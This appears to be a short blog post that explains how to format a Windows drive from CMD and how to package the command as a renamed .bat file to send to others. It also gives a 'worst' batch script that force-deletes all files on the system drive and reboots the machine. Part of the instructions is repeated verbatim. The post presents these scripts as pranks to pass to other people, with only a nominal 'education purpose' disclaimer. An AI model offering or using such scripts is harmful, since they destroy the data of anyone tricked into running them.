If you want to format any partition through CMD then:
1. Go to start
2. Click on run
3. Write here CMD and press enter
4. Now write in CMD format c:\ /Q/X and press enter
Note: You can replace c with what drive you want to format
Or if you want to send this to others like a file then:
1. Open your notePad
2. Write in there format c:\ /Q/X
3. Then save it giving name format.bat
Note: You can replace format with any other word
If you want worst that write this in notepad and save as .bat file
Use this carefully as this is undone-able.1. Go to start
2. Click on run
3. Write here CMD and press enter
4. Now write in CMD format c:\ /Q/X and press enter
Note: You can replace c with what drive you want to format
Or if you want to send this to others like a file then:
1. Open your notePad
2. Write in there format c:\ /Q/X
3. Then save it giving name format.bat
Note: You can replace format with any other word
If you want worst that write this in notepad and save as .bat file
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Note: These tricks are for education purpose and can harm your or others pc.
No comments:
Post a Comment